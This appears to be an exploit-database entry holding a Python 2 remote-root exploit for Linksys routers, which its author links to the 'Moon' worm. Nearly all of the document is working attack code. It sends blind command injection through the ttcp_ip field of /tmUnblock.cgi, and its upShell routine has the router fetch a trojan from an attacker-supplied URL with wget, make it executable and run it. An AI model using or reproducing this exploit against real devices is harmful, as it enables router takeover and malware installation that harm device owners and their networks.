Linksys Worm Remote Root



EKU-ID: 3822 CVE: OSVDB-ID:
Author: infodox Published: 2014-02-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python2
"""
Linksys Remote Root Exploit
infodox - insecurety research
This is the exploit this "Moon" worm uses.
Trivial blind cmd injection :)
This version crippled - uses wget.
Twitter: @info_dox
Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
"""
import requests
import sys

def banner():
    print """\x1b[0;32m
.____    .__        __                          
|    |   |__| ____ |  | __  _________.__. ______
|    |   |  |/    \|  |/ / /  ___<   |  |/  ___/
|    |___|  |   |  \    <  \___ \ \___  |\___ \ 
|_______ \__|___|  /__|_ \/____  >/ ____/____  >
        \/       \/     \/     \/ \/         \/ 
       You are the weakest link. Goodbye.
Linksys remote root - infodox - Insecurety Research.
Version 2: Crippled (wget shelldrop only)
    \x1b[0m"""

def upShell(wget_url, target):
""" This works with the normal busybox wget at least, and worked in testing"""
    cmd = "wget %s -O /tmp/.trojan;chmod 777 /tmp/.trojan;/tmp/.trojan" %(wget_url)
    print "{+} Planting Bomb!"
    execute_command(target=target, command=cmd)
    print "{!} TERRORISTS WIN!"

def execute_command(target, command):
    url = target + "/tmUnblock.cgi"
    injection = "-h `%s`" %(command)
    # this is a very sexy POST request. TOTALLY LEGIT.
    the_ownage = {'submit_button': '',
                  'change_action': '', 
                  'action': '', 
                  'commit': '0',
                  'ttcp_num': '2',
                  'ttcp_size': '2',
                  'ttcp_ip': injection,
                  'StartEPI': '1'}
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]'}
    # it is truly mad hax.
    mad_hax = requests.post(url=url, data=the_ownage, headers=headers)

def main(args):
    banner()
    if len(sys.argv) != 3:
        sys.exit("usage: %s http://target http://me.com/trojan.bin" %(sys.argv[0]))
    upShell(wget_url=sys.argv[2], target=sys.argv[1])

if __name__ == "__main__":
    main(sys.argv)